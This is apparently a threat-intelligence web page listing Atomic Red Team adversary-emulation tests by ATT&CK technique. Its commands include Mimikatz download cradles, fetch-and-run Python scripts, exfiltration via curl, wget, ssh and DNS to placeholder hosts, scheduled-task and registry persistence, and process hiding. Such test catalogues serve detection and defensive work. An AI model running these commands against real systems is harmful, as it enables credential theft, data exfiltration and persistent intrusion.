manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1027.001 Binary Padding · 2 tests

shlinux, macosPad Binary to Change Hash - Linux/macOS dd

dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data

shlinux, macosPad Binary to Change Hash using truncate command - Linux/macOS

truncate -s +1 #{file_to_pad} #adds a byte to the file size

T1027.002 Software Packing · 4 tests

shlinuxBinary simply packed by UPX (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shlinuxBinary packed by UPX, with modified headers (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary simply packed by UPX

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary packed by UPX, with modified headers

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

T1027.006 HTML Smuggling · 1 test

powershellwindowsHTML Smuggling Remote Payload

& "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.004 Masquerade Task or Service · 4 tests

command_promptelevatedwindowsCreating W32Time similar named service using schtasks

schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times

command_promptelevatedwindowsCreating W32Time similar named service using sc

sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times

shlinuxlinux rename /proc/pid/comm using prctl

#{exe_path} & ps
TMP=`ps | grep totally_legit`
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
exit 0

shelevatedlinuxHiding a malicious process with bind mounts

eval '(while true; do :; done) &'
echo $! > /tmp/evil_pid.txt
random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1037.004 RC Scripts · 3 tests

bashelevatedmacosrc.common

sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common

bashelevatedlinuxrc.common

filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common

shelevatedlinuxrc.local

filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local
echo "\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local

T1047 Windows Management Instrumentation · 10 tests

command_promptwindowsWMI Reconnaissance Users

wmic useraccount get /ALL /format:csv

command_promptwindowsWMI Reconnaissance Processes

wmic process get caption,executablepath,commandline /format:csv

command_promptwindowsWMI Reconnaissance Software

wmic qfe get description,installedOn /format:csv

command_promptwindowsWMI Reconnaissance List Remote Services

wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")

command_promptwindowsWMI Execute Local Process

wmic process call create #{process_to_execute}

command_promptwindowsWMI Execute Remote Process

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}

command_promptwindowsCreate a Process using WMI Query and an Encoded Command

powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA

powershellelevatedwindowsCreate a Process using obfuscated Win32_Process

$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}

command_promptwindowsWMI Execute rundll32

wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"

command_promptelevatedwindowsApplication uninstall using WMIC

wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall

T1048 Exfiltration Over Alternative Protocol · 4 tests

shmacos, linuxExfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

shmacos, linuxExfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

powershellwindowsDNSExfiltration (doh)

Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

bashmacos, linuxExfiltrate Data using DNS Queries via dig

dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com

T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol · 4 tests

command_promptwindowsExfiltrate data HTTPS using curl windows

#{curl_path} -k -F "file=@#{input_file}" https://file.io/

bashmacos, linuxExfiltrate data HTTPS using curl freebsd,linux or macos

curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/

shlinuxExfiltrate data in a file over HTTPS using wget

wget --post-file="#{input_file}" --timeout=5 --no-check-certificate #{endpoint_domain} --delete-after

shlinuxExfiltrate data as text over HTTPS using wget

wget --post-data="msg=AtomicTestT1048.002" --timeout=5 --no-check-certificate #{endpoint_domain} --delete-after

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1059.005 Visual Basic · 3 tests

powershellwindowsVisual Basic script execution to gather local computer information

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

powershellwindowsEncoded VBS code execution

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

powershellwindowsExtract Memory via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

T1059.006 Python · 4 tests

shlinuxExecute shell script via python's command mode arguement

which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'

shlinuxExecute Python via scripts

which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}

shlinuxExecute Python via Python executables

which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}

shlinuxPython pty module and spawn function used to spawn sh or bash

which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit

▶

Tools Used

23 mapped

◈

CVEs Exploited

CVECVE-2018-13379
CVECVE-2019-11510
CVECVE-2019-19781
CVECVE-2019-9670
CVECVE-2020-0688
CVECVE-2021-36934
CVECVE-2023-42793

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin